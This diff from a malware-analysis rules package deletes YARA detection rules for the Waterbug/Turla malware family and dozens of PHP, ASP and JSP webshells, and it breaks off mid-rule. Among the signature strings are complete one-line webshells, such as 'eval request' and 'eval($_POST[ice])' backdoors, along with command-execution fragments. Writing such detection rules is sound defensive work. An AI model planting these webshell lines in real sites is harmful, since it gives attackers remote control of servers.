-        last_modified = "2014-07-10"
-        
-    strings:
-        $ = "/2011/n325423.shtml?"
-        $ = "wyle"
-        $ = "\\~ISUN32.EXE"
-
-    condition:
-       any of them
-}
-
-rule Warp : Family
-{
-    meta:
-        description = "Warp"
-        author = "Seth Hardy"
-        last_modified = "2014-07-10"
-        
-    condition:
-        WarpCode or WarpStrings
-}
diff -Nru remnux-rules-0.0.3/yara/Waterbug.yara remnux-rules-0.0.4/yara/Waterbug.yara
--- remnux-rules-0.0.3/yara/Waterbug.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Waterbug.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,100 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule WaterBug_wipbot_2013_core_PDF {
-	meta:
-		description = "Symantec Waterbug Attack - Trojan.Wipbot 2014 core PDF"
-		author = "Symantec Security Response"
-		date = "22.01.2015"
-		reference = "http://t.co/rF35OaAXrl"
-	strings:
-		$PDF = "%PDF-"
-		$a = /\+[A-Za-z]{1}\. _ _ \$\+[A-Za-z]{1}\. _ \$ _ \+/ 
-		$b = /\+[A-Za-z]{1}\.\$\$\$ _ \+/
-	condition:
-		($PDF at 0) and #a > 150 and #b > 200
-}
-
-rule WaterBug_wipbot_2013_dll {
-	meta:
-		description = "Symantec Waterbug Attack - Trojan.Wipbot 2014 Down.dll component"
-		author = "Symantec Security Response"
-		date = "22.01.2015"
-		reference = "http://t.co/rF35OaAXrl"		
-	strings:
-		$string1 = "/%s?rank=%s"
-		$string2 = "ModuleStart\x00ModuleStop\x00start"
-		$string3 = "1156fd22-3443-4344-c4ffff"
-		//read file... error..
-		$string4 = "read\x20file\x2E\x2E\x2E\x20error\x00\x00"
-	condition:
-		2 of them
-}
-
-rule WaterBug_wipbot_2013_core {
-	meta:
-		description = "Symantec Waterbug Attack - Trojan.Wipbot core + core; garbage appended data (PDF Exploit leftovers) + wipbot dropper; fake AdobeRd32 Error"
-		author = "Symantec Security Response"
-		date = "22.01.2015"
-		reference = "http://t.co/rF35OaAXrl"			
-	strings:
-		$mz = "MZ"
-		$code1 = { 89 47 0C C7 47 10 90 C2 04 00 C7 47 14 90 C2 10 00 C7 47 18 90 90 60 68 89 4F 1C C7 47 20 90 90 90 B8 89 4F 24 C7 47 28 90 FF D0 61 C7 47 2C 90 C2 04 00}
-		$code2 = { 85 C0 75 25 8B 0B BF ?? ?? ?? ?? EB 17 69 D7 0D 66 19 00 8D BA 5F F3 6E 3C 89 FE C1 EE 10 89 F2 30 14 01 40 3B 43 04 72 E4}
-		$code3 = {90 90 90 ?? B9 00 4D 5A 90 00 03 00 00 00 82 04} $code4 = {55 89 E5 5D C3 55 89 E5 83 EC 18 8B 45 08 85 C0}
-	condition:
-		$mz at 0 and (($code1 or $code2) or ($code3 and $code4))
-}
-
-rule WaterBug_turla_dropper {
-	meta:
-		description = "Symantec Waterbug Attack - Trojan Turla Dropper"
-		author = "Symantec Security Response"
-		date = "22.01.2015"
-		reference = "http://t.co/rF35OaAXrl"
-	strings: 
-		$a = {0F 31 14 31 20 31 3C 31 85 31 8C 31 A8 31 B1 31 D1 31 8B 32 91 32 B6 32 C4 32 6C 33 AC 33 10 34}
-		$b = {48 41 4C 2E 64 6C 6C 00 6E 74 64 6C 6C 00 00 00 57 8B F9 8B 0D ?? ?? ?? ?? ?? C9 75 26 56 0F 20 C6 8B C6 25 FF FF FE FF 0F 22 C0 E8}
-	condition: 
-		all of them
-}
-
-rule WaterBug_fa_malware { 
-	meta: 
-		description = "Symantec Waterbug Attack - FA malware variant"
-		author = "Symantec Security Response"
-		date = "22.01.2015"
-		reference = "http://t.co/rF35OaAXrl"
-	strings:
-		$mz = "MZ"
-		$string1 = "C:\\proj\\drivers\\fa _ 2009\\objfre\\i386\\atmarpd.pdb"
-		$string2 = "d:\\proj\\cn\\fa64\\"
-		$string3 = "sengoku_Win32.sys\x00"
-		$string4 = "rk_ntsystem.c"
-		$string5 = "\\uroboros\\"
-		$string6 = "shell.{F21EDC09-85D3-4eb9-915F-1AFA2FF28153}"
-	condition:
-		($mz at 0) and (any of ($string*))
-}
-
-
-rule WaterBug_sav {
-	meta: 
-		description = "Symantec Waterbug Attack - SAV Malware"
-		author = "Symantec Security Response"
-		date = "22.01.2015"
-		reference = "http://t.co/rF35OaAXrl" 	
-	strings:
-		$mz = "MZ"
-		$code1a = { 8B 75 18 31 34 81 40 3B C2 72 F5 33 F6 39 7D 14 76 1B 8A 04 0E 88 04 0F 6A 0F 33 D2 8B C7 5B F7 F3 85 D2 75 01 }
-		$code1b = { 8B 45 F8 40 89 45 F8 8B 45 10 C1 E8 02 39 45 F8 73 17 8B 45 F8 8B 4D F4 8B 04 81 33 45 20 8B 4D F8 8B 55 F4 89 04 8A EB D7 83 65 F8 00 83 65 EC 00 EB 0E 8B 45 F8 40 89 45 F8 8B 45 EC 40 89 45 EC 8B 45 EC	3B 45 10 73 27 8B 45 F4 03 45 F8 8B 4D F4 03 4D EC 8A 09 88 08 8B 45 F8 33 D2 6A 0F 59 F7 F1 85 D2 75 07 }
-		$code1c = { 8A 04 0F 88 04 0E 6A 0F 33 D2 8B C6 5B F7 F3 85 D2 75 01 47 8B 45 14 46 47 3B F8 72 E3 EB 04 C6 04 08 00 48 3B C6 73 F7 33 C0 C1 EE 02 74 0B 8B 55 18 31 14 81 40 3B C6 72 F5 }
-		$code2 =  { 29 5D 0C 8B D1 C1 EA 05 2B CA 8B 55 F4 2B C3 3D 00 00 00 01 89 0F 8B 4D 10 8D 94 91 00 03 00 00 73 17 8B 7D F8 8B 4D 0C 0F B6 3F C1 E1 08 0B CF C1 E0 08 FF 45 F8 89 4D 0C 8B 0A 8B F8 C1 EF 0B}
-	condition:
-		($mz at 0) and (($code1a or $code1b or $code1c) and $code2) 
-}
-
diff -Nru remnux-rules-0.0.3/yara/Webshell-shell.yara remnux-rules-0.0.4/yara/Webshell-shell.yara
--- remnux-rules-0.0.3/yara/Webshell-shell.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Webshell-shell.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,7971 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule Weevely_Webshell {
-	meta:
-		description = "Weevely Webshell - Generic Rule - heavily scrambled tiny web shell"
-		author = "Florian Roth"
-		reference = "http://www.ehacking.net/2014/12/weevely-php-stealth-web-backdoor-kali.html"
-		date = "2014/12/14"
-		score = 60
-	strings:
-		$php = "<?php" ascii
-		$s0 = /\$[a-z]{4} = \$[a-z]{4}\("[a-z][a-z]?",[\s]?"",[\s]?"/ ascii
-		$s1 = /\$[a-z]{4} = str_replace\("[a-z][a-z]?","","/ ascii
-		$s2 = /\$[a-z]{4}\.\$[a-z]{4}\.\$[a-z]{4}\.\$[a-z]{4}\)\)\); \$[a-z]{4}\(\);/ ascii
-		$s4 = /\$[a-z]{4}="[a-zA-Z0-9]{70}/ ascii
-	condition:
-		$php at 0 and all of ($s*) and filesize > 570 and filesize < 800
-}
-
-rule webshell_h4ntu_shell_powered_by_tsoi_ {
-	meta:
-		description = "Web Shell - file h4ntu shell [powered by tsoi].php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "06ed0b2398f8096f1bebf092d0526137"
-	strings:
-		$s0 = "  <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>Server Adress:</b"
-		$s3 = "  <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>User Info:</b> ui"
-		$s4 = "    <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><?= $info ?>: <?= "
-		$s5 = "<INPUT TYPE=\"text\" NAME=\"cmd\" value=\"<?php echo stripslashes(htmlentities($"
-	condition:
-		all of them
-}
-rule webshell_PHP_sql {
-	meta:
-		description = "Web Shell - file sql.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "2cf20a207695bbc2311a998d1d795c35"
-	strings:
-		$s0 = "$result=mysql_list_tables($db) or die (\"$h_error<b>\".mysql_error().\"</b>$f_"
-		$s4 = "print \"<a href=\\\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&"
-	condition:
-		all of them
-}
-rule webshell_PHP_a {
-	meta:
-		description = "Web Shell - file a.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "e3b461f7464d81f5022419d87315a90d"
-	strings:
-		$s1 = "echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\""
-		$s2 = "echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>"
-		$s4 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p> " fullword
-	condition:
-		2 of them
-}
-rule webshell_iMHaPFtp_2 {
-	meta:
-		description = "Web Shell - file iMHaPFtp.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "12911b73bc6a5d313b494102abcf5c57"
-	strings:
-		$s8 = "if ($l) echo '<a href=\"' . $self . '?action=permission&amp;file=' . urlencode($"
-		$s9 = "return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAA"
-	condition:
-		1 of them
-}
-rule webshell_Jspspyweb {
-	meta:
-		description = "Web Shell - file Jspspyweb.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "4e9be07e95fff820a9299f3fb4ace059"
-	strings:
-		$s0 = "      out.print(\"<tr><td width='60%'>\"+strCut(convertPath(list[i].getPath()),7"
-		$s3 = "  \"reg add \\\"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Control"
-	condition:
-		all of them
-}
-rule webshell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2 {
-	meta:
-		description = "Web Shell - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "49ad9117c96419c35987aaa7e2230f63"
-	strings:
-		$s0 = "die(\"\\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\\n"
-		$s1 = "Mode Shell v1.0</font></span></a></font><font face=\"Webdings\" size=\"6\" color"
-	condition:
-		1 of them
-}
-rule webshell_SimAttacker_Vrsion_1_0_0_priv8_4_My_friend {
-	meta:
-		description = "Web Shell - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "089ff24d978aeff2b4b2869f0c7d38a3"
-	strings:
-		$s2 = "echo \"<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><fo"
-		$s3 = "fputs ($fp ,\"\\n*********************************************\\nWelcome T0 Sim"
-	condition:
-		1 of them
-}
-rule webshell_phpshell_2_1_pwhash {
-	meta:
-		description = "Web Shell - file pwhash.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "ba120abac165a5a30044428fac1970d8"
-	strings:
-		$s1 = "<tt>&nbsp;</tt>\" (space), \"<tt>[</tt>\" (left bracket), \"<tt>|</tt>\" (pi"
-		$s3 = "word: \"<tt>null</tt>\", \"<tt>yes</tt>\", \"<tt>no</tt>\", \"<tt>true</tt>\","
-	condition:
-		1 of them
-}
-rule webshell_PHPRemoteView {
-	meta:
-		description = "Web Shell - file PHPRemoteView.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "29420106d9a81553ef0d1ca72b9934d9"
-	strings:
-		$s2 = "<input type=submit value='\".mm(\"Delete all dir/files recursive\").\" (rm -fr)'"
-		$s4 = "<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u"
-	condition:
-		1 of them
-}
-rule webshell_jsp_12302 {
-	meta:
-		description = "Web Shell - file 12302.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "a3930518ea57d899457a62f372205f7f"
-	strings:
-		$s0 = "</font><%out.print(request.getRealPath(request.getServletPath())); %>" fullword
-		$s1 = "<%@page import=\"java.io.*,java.util.*,java.net.*\"%>" fullword
-		$s4 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\""
-	condition:
-		all of them
-}
-rule webshell_caidao_shell_guo {
-	meta:
-		description = "Web Shell - file guo.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "9e69a8f499c660ee0b4796af14dc08f0"
-	strings:
-		$s0 = "<?php ($www= $_POST['ice'])!"
-		$s1 = "@preg_replace('/ad/e','@'.str_rot13('riny').'($ww"
-	condition:
-		1 of them
-}
-rule webshell_PHP_redcod {
-	meta:
-		description = "Web Shell - file redcod.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "5c1c8120d82f46ff9d813fbe3354bac5"
-	strings:
-		$s0 = "H8p0bGFOEy7eAly4h4E4o88LTSVHoAglJ2KLQhUw" fullword
-		$s1 = "HKP7dVyCf8cgnWFy8ocjrP5ffzkn9ODroM0/raHm" fullword
-	condition:
-		all of them
-}
-rule webshell_remview_fix {
-	meta:
-		description = "Web Shell - file remview_fix.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "a24b7c492f5f00e2a19b0fa2eb9c3697"
-	strings:
-		$s4 = "<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u"
-		$s5 = "echo \"<P><hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n"
-	condition:
-		1 of them
-}
-rule webshell_asp_cmd {
-	meta:
-		description = "Web Shell - file cmd.asp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "895ca846858c315a3ff8daa7c55b3119"
-	strings:
-		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
-		$s1 = "Set oFileSys = Server.CreateObject(\"Scripting.FileSystemObject\")" fullword
-		$s3 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword
-	condition:
-		1 of them
-}
-rule webshell_php_sh_server {
-	meta:
-		description = "Web Shell - file server.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 50
-		hash = "d87b019e74064aa90e2bb143e5e16cfa"
-	strings:
-		$s0 = "eval(getenv('HTTP_CODE'));" fullword
-	condition:
-		all of them
-}
-rule webshell_PH_Vayv_PH_Vayv {
-	meta:
-		description = "Web Shell - file PH Vayv.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "35fb37f3c806718545d97c6559abd262"
-	strings:
-		$s0 = "style=\"BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px in"
-		$s4 = "<font color=\"#858585\">SHOPEN</font></a></font><font face=\"Verdana\" style"
-	condition:
-		1 of them
-}
-rule webshell_caidao_shell_ice {
-	meta:
-		description = "Web Shell - file ice.asp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "6560b436d3d3bb75e2ef3f032151d139"
-	strings:
-		$s0 = "<%eval request(\"ice\")%>" fullword
-	condition:
-		all of them
-}
-rule webshell_cihshell_fix {
-	meta:
-		description = "Web Shell - file cihshell_fix.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "3823ac218032549b86ee7c26f10c4cb5"
-	strings:
-		$s7 = "<tr style='background:#242424;' ><td style='padding:10px;'><form action='' encty"
-		$s8 = "if (isset($_POST['mysqlw_host'])){$dbhost = $_POST['mysqlw_host'];} else {$dbhos"
-	condition:
-		1 of them
-}
-rule webshell_asp_shell {
-	meta:
-		description = "Web Shell - file shell.asp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "e63f5a96570e1faf4c7b8ca6df750237"
-	strings:
-		$s7 = "<input type=\"submit\" name=\"Send\" value=\"GO!\">" fullword
-		$s8 = "<TEXTAREA NAME=\"1988\" ROWS=\"18\" COLS=\"78\"></TEXTAREA>" fullword
-	condition:
-		all of them
-}
-rule webshell_Private_i3lue {
-	meta:
-		description = "Web Shell - file Private-i3lue.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "13f5c7a035ecce5f9f380967cf9d4e92"
-	strings:
-		$s8 = "case 15: $image .= \"\\21\\0\\"
-	condition:
-		all of them
-}
-rule webshell_php_up {
-	meta:
-		description = "Web Shell - file up.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "7edefb8bd0876c41906f4b39b52cd0ef"
-	strings:
-		$s0 = "copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);" fullword
-		$s3 = "if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {" fullword
-		$s8 = "echo \"Uploaded file: \" . $HTTP_POST_FILES['userfile']['name'];" fullword
-	condition:
-		2 of them
-}
-rule webshell_Mysql_interface_v1_0 {
-	meta:
-		description = "Web Shell - file Mysql interface v1.0.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "a12fc0a3d31e2f89727b9678148cd487"
-	strings:
-		$s0 = "echo \"<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\\\"return"
-	condition:
-		all of them
-}
-rule webshell_php_s_u {
-	meta:
-		description = "Web Shell - file s-u.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "efc7ba1a4023bcf40f5e912f1dd85b5a"
-	strings:
-		$s6 = "<a href=\"?act=do\"><font color=\"red\">Go Execute</font></a></b><br /><textarea"
-	condition:
-		all of them
-}
-rule webshell_phpshell_2_1_config {
-	meta:
-		description = "Web Shell - file config.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "bd83144a649c5cc21ac41b505a36a8f3"
-	strings:
-		$s1 = "; (choose good passwords!).  Add uses as simple 'username = \"password\"' lines." fullword
-	condition:
-		all of them
-}
-rule webshell_asp_EFSO_2 {
-	meta:
-		description = "Web Shell - file EFSO_2.asp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "a341270f9ebd01320a7490c12cb2e64c"
-	strings:
-		$s0 = "%8@#@&P~,P,PP,MV~4BP^~,NS~m~PXc3,_PWbSPU W~~[u3Fffs~/%@#@&~~,PP~~,M!PmS,4S,mBPNB"
-	condition:
-		all of them
-}
-rule webshell_jsp_up {
-	meta:
-		description = "Web Shell - file up.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "515a5dd86fe48f673b72422cccf5a585"
-	strings:
-		$s9 = "// BUG: Corta el fichero si es mayor de 640Ks" fullword
-	condition:
-		all of them
-}
-rule webshell_NetworkFileManagerPHP {
-	meta:
-		description = "Web Shell - file NetworkFileManagerPHP.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "acdbba993a5a4186fd864c5e4ea0ba4f"
-	strings:
-		$s9 = "  echo \"<br><center>All the data in these tables:<br> \".$tblsv.\" were putted "
-	condition:
-		all of them
-}
-rule webshell_Server_Variables {
-	meta:
-		description = "Web Shell - file Server Variables.asp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "47fb8a647e441488b30f92b4d39003d7"
-	strings:
-		$s7 = "<% For Each Vars In Request.ServerVariables %>" fullword
-		$s9 = "Variable Name</B></font></p>" fullword
-	condition:
-		all of them
-}
-rule webshell_caidao_shell_ice_2 {
-	meta:
-		description = "Web Shell - file ice.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "1d6335247f58e0a5b03e17977888f5f2"
-	strings:
-		$s0 = "<?php ${${eval($_POST[ice])}};?>" fullword
-	condition:
-		all of them
-}
-rule webshell_caidao_shell_mdb {
-	meta:
-		description = "Web Shell - file mdb.asp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "fbf3847acef4844f3a0d04230f6b9ff9"
-	strings:
-		$s1 = "<% execute request(\"ice\")%>a " fullword
-	condition:
-		all of them
-}
-rule webshell_jsp_guige {
-	meta:
-		description = "Web Shell - file guige.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "2c9f2dafa06332957127e2c713aacdd2"
-	strings:
-		$s0 = "if(damapath!=null &&!damapath.equals(\"\")&&content!=null"
-	condition:
-		all of them
-}
-rule webshell_phpspy2010 {
-	meta:
-		description = "Web Shell - file phpspy2010.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "14ae0e4f5349924a5047fed9f3b105c5"
-	strings:
-		$s3 = "eval(gzinflate(base64_decode("
-		$s5 = "//angel" fullword
-		$s8 = "$admin['cookiedomain'] = '';" fullword
-	condition:
-		all of them
-}
-rule webshell_asp_ice {
-	meta:
-		description = "Web Shell - file ice.asp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "d141e011a92f48da72728c35f1934a2b"
-	strings:
-		$s0 = "D,'PrjknD,J~[,EdnMP[,-4;DS6@#@&VKobx2ldd,'~JhC"
-	condition:
-		all of them
-}
-rule webshell_drag_system {
-	meta:
-		description = "Web Shell - file system.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "15ae237cf395fb24cf12bff141fb3f7c"
-	strings:
-		$s9 = "String sql = \"SELECT * FROM DBA_TABLES WHERE TABLE_NAME not like '%$%' and num_"
-	condition:
-		all of them
-}
-rule webshell_DarkBlade1_3_asp_indexx {
-	meta:
-		description = "Web Shell - file indexx.asp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "b7f46693648f534c2ca78e3f21685707"
-	strings:
-		$s3 = "Const strs_toTransform=\"command|Radmin|NTAuThenabled|FilterIp|IISSample|PageCou"
-	condition:
-		all of them
-}
-rule webshell_phpshell3 {
-	meta:
-		description = "Web Shell - file phpshell3.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "76117b2ee4a7ac06832d50b2d04070b8"
-	strings:
-		$s2 = "<input name=\"nounce\" type=\"hidden\" value=\"<?php echo $_SESSION['nounce'];"
-		$s5 = "<p>Username: <input name=\"username\" type=\"text\" value=\"<?php echo $userna"
-		$s7 = "$_SESSION['output'] .= \"cd: could not change to: $new_dir\\n\";" fullword
-	condition:
-		2 of them
-}
-rule webshell_jsp_hsxa {
-	meta:
-		description = "Web Shell - file hsxa.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "d0e05f9c9b8e0b3fa11f57d9ab800380"
-	strings:
-		$s0 = "<%@ page language=\"java\" pageEncoding=\"gbk\"%><jsp:directive.page import=\"ja"
-	condition:
-		all of them
-}
-rule webshell_jsp_utils {
-	meta:
-		description = "Web Shell - file utils.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "9827ba2e8329075358b8e8a53e20d545"
-	strings:
-		$s0 = "ResultSet r = c.getMetaData().getTables(null, null, \"%\", t);" fullword
-		$s4 = "String cs = request.getParameter(\"z0\")==null?\"gbk\": request.getParameter(\"z"
-	condition:
-		all of them
-}
-rule webshell_asp_01 {
-	meta:
-		description = "Web Shell - file 01.asp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 50
-		hash = "61a687b0bea0ef97224c7bd2df118b87"
-	strings:
-		$s0 = "<%eval request(\"pass\")%>" fullword
-	condition:
-		all of them
-}
-rule webshell_asp_404 {
-	meta:
-		description = "Web Shell - file 404.asp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "d9fa1e8513dbf59fa5d130f389032a2d"
-	strings:
-		$s0 = "lFyw6pd^DKV^4CDRWmmnO1GVKDl:y& f+2"
-	condition:
-		all of them
-}
-rule webshell_webshell_cnseay02_1 {
-	meta:
-		description = "Web Shell - file webshell-cnseay02-1.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "95fc76081a42c4f26912826cb1bd24b1"
-	strings:
-		$s0 = "(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU"
-	condition:
-		all of them
-}
-rule webshell_php_fbi {
-	meta:
-		description = "Web Shell - file fbi.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "1fb32f8e58c8deb168c06297a04a21f1"
-	strings:
-		$s7 = "erde types','Getallen','Datum en tijd','Tekst','Binaire gegevens','Netwerk','Geo"
-	condition:
-		all of them
-}
-rule webshell_B374kPHP_B374k {
-	meta:
-		description = "Web Shell - file B374k.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "bed7388976f8f1d90422e8795dff1ea6"
-	strings:
-		$s0 = "Http://code.google.com/p/b374k-shell" fullword
-		$s1 = "$_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'"
-		$s3 = "Jayalah Indonesiaku & Lyke @ 2013" fullword
-		$s4 = "B374k Vip In Beautify Just For Self" fullword
-	condition:
-		1 of them
-}
-rule webshell_cmd_asp_5_1 {
-	meta:
-		description = "Web Shell - file cmd-asp-5.1.asp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "8baa99666bf3734cbdfdd10088e0cd9f"
-	strings:
-		$s9 = "Call oS.Run(\"win.com cmd.exe /c \"\"\" & szCMD & \" > \" & szTF &" fullword
-	condition:
-		all of them
-}
-rule webshell_php_dodo_zip {
-	meta:
-		description = "Web Shell - file zip.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "b7800364374077ce8864796240162ad5"
-	strings:
-		$s0 = "$hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x"
-		$s3 = "$datastr = \"\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
-	condition:
-		all of them
-}
-rule webshell_aZRaiLPhp_v1_0 {
-	meta:
-		description = "Web Shell - file aZRaiLPhp v1.0.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "26b2d3943395682e36da06ed493a3715"
-	strings:
-		$s5 = "echo \" <font color='#0000FF'>CHMODU \".substr(base_convert(@fileperms($"
-		$s7 = "echo \"<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo"
-	condition:
-		all of them
-}
-rule webshell_php_list {
-	meta:
-		description = "Web Shell - file list.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "922b128ddd90e1dc2f73088956c548ed"
-	strings:
-		$s1 = "// list.php = Directory & File Listing" fullword
-		$s2 = "    echo \"( ) <a href=?file=\" . $fichero . \"/\" . $filename . \">\" . $filena"
-		$s9 = "// by: The Dark Raver" fullword
-	condition:
-		1 of them
-}
-rule webshell_ironshell {
-	meta:
-		description = "Web Shell - file ironshell.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "8bfa2eeb8a3ff6afc619258e39fded56"
-	strings:
-		$s4 = "print \"<form action=\\\"\".$me.\"?p=cmd&dir=\".realpath('.').\""
-		$s8 = "print \"<td id=f><a href=\\\"?p=rename&file=\".realpath($file).\"&di"
-	condition:
-		all of them
-}
-rule webshell_caidao_shell_404 {
-	meta:
-		description = "Web Shell - file 404.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "ee94952dc53d9a29bdf4ece54c7a7aa7"
-	strings:
-		$s0 = "<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('St"
-	condition:
-		all of them
-}
-rule webshell_ASP_aspydrv {
-	meta:
-		description = "Web Shell - file aspydrv.asp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "de0a58f7d1e200d0b2c801a94ebce330"
-	strings:
-		$s3 = "<%=thingy.DriveLetter%> </td><td><tt> <%=thingy.DriveType%> </td><td><tt> <%=thi"
-	condition:
-		all of them
-}
-rule webshell_jsp_web {
-	meta:
-		description = "Web Shell - file web.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "4bc11e28f5dccd0c45a37f2b541b2e98"
-	strings:
-		$s0 = "<%@page import=\"java.io.*\"%><%@page import=\"java.net.*\"%><%String t=request."
-	condition:
-		all of them
-}
-rule webshell_mysqlwebsh {
-	meta:
-		description = "Web Shell - file mysqlwebsh.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "babfa76d11943a22484b3837f105fada"
-	strings:
-		$s3 = " <TR><TD bgcolor=\"<? echo (!$CONNECT && $action == \"chparam\")?\"#660000\":\"#"
-	condition:
-		all of them
-}
-rule webshell_jspShell {
-	meta:
-		description = "Web Shell - file jspShell.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "0d5b5a17552254be6c1c8f1eb3a5fdc1"
-	strings:
-		$s0 = "<input type=\"checkbox\" name=\"autoUpdate\" value=\"AutoUpdate\" on"
-		$s1 = "onblur=\"document.shell.autoUpdate.checked= this.oldValue;"
-	condition:
-		all of them
-}
-rule webshell_Dx_Dx {
-	meta:
-		description = "Web Shell - file Dx.php"
-		author = "Florian Roth"
